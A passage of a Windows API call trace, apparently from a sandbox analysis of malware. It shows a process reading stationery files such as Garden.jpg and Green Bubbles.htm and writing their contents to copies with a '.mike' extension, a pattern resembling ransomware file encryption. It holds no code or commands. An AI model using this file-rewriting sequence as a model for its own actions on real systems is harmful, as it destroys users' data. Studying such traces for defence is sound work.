lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0053.554] WriteFile (in: hFile=0x288, lpBuffer=0x2120434*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2120434*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0053.555] CloseHandle (hObject=0x288) returned 1 [0053.555] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.555] GetFileType (hFile=0x288) returned 0x1 [0053.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.556] GetFileType (hFile=0x288) returned 0x1 [0053.556] SetFilePointer (in: hFile=0x288, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0053.556] ReadFile (in: hFile=0x288, lpBuffer=0x2122e80, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2122e80*, lpNumberOfBytesRead=0x2af0c8*=0xd3f, lpOverlapped=0x0) returned 1 [0053.556] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.557] GetFileType (hFile=0x288) returned 0x1 [0053.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.557] GetFileType (hFile=0x288) returned 0x1 [0053.557] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5220 [0053.557] WriteFile (in: hFile=0x288, lpBuffer=0x212ac88*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x212ac88*, lpNumberOfBytesWritten=0x2af0bc*=0xd40, lpOverlapped=0x0) returned 1 [0053.557] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0053.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.557] GetFileType (hFile=0x288) returned 0x1 [0053.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0053.557] GetFileType (hFile=0x288) returned 0x1 [0053.558] WriteFile (in: hFile=0x288, lpBuffer=0x212dea8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x212dea8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.558] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.559] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92c42c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe92c42c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93829a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5f60)) returned 1 [0053.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.559] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x212f5d4 | out: lpFileInformation=0x212f5d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92c42c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe92c42c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93829a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5f60)) returned 1 [0053.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", dwFileAttributes=0x80) returned 0 [0053.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0053.560] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92c42c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe92c42c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe93829a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5f60)) returned 1 [0053.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0053.561] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.561] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.561] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike")) returned 1 [0053.562] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf", lpFilePart=0x0) returned 0x45 [0053.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf", lpFilePart=0x0) returned 0x45 [0053.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf", lpFilePart=0x0) returned 0x43 [0053.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0053.571] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0053.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.571] GetFileType (hFile=0x288) returned 0x1 [0053.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0053.571] GetFileType (hFile=0x288) returned 0x1 [0053.572] CloseHandle (hObject=0x288) returned 1 [0053.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.572] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0053.572] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0053.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.572] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), fInfoLevelId=0x0, lpFileInformation=0x21386f0 | out: lpFileInformation=0x21386f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2d2cf5, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2d2cf5, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce071725, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed)) returned 1 [0053.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.572] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), fInfoLevelId=0x0, lpFileInformation=0x2138a24 | out: lpFileInformation=0x2138a24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2d2cf5, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2d2cf5, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce071725, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed)) returned 1 [0053.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.573] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.573] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.573] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.573] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.573] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.573] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.573] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0053.574] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0053.574] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.574] GetFileType (hFile=0x288) returned 0x1 [0053.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.574] GetFileType (hFile=0x288) returned 0x1 [0053.574] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.574] WriteFile (in: hFile=0x288, lpBuffer=0x213993c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x213993c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0053.575] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), fInfoLevelId=0x0, lpFileInformation=0x2139410 | out: lpFileInformation=0x2139410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2d2cf5, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2d2cf5, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce071725, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed)) returned 1 [0053.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0053.576] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.576] GetFileType (hFile=0x288) returned 0x1 [0053.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.576] GetFileType (hFile=0x288) returned 0x1 [0053.576] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.576] ReadFile (in: hFile=0x288, lpBuffer=0x213aa78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x213aa78*, lpNumberOfBytesRead=0x2af0c8*=0xed, lpOverlapped=0x0) returned 1 [0053.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.577] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.577] GetFileType (hFile=0x288) returned 0x1 [0053.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.578] GetFileType (hFile=0x288) returned 0x1 [0053.578] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.578] WriteFile (in: hFile=0x288, lpBuffer=0x213dd14*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x213dd14*, lpNumberOfBytesWritten=0x2af0bc*=0xf0, lpOverlapped=0x0) returned 1 [0053.578] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", lpFilePart=0x0) returned 0x50 [0053.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0053.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.578] GetFileType (hFile=0x288) returned 0x1 [0053.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0053.578] GetFileType (hFile=0x288) returned 0x1 [0053.579] WriteFile (in: hFile=0x288, lpBuffer=0x2140f54*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2140f54*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.579] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpFilePart=0x0) returned 0x4b [0053.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green 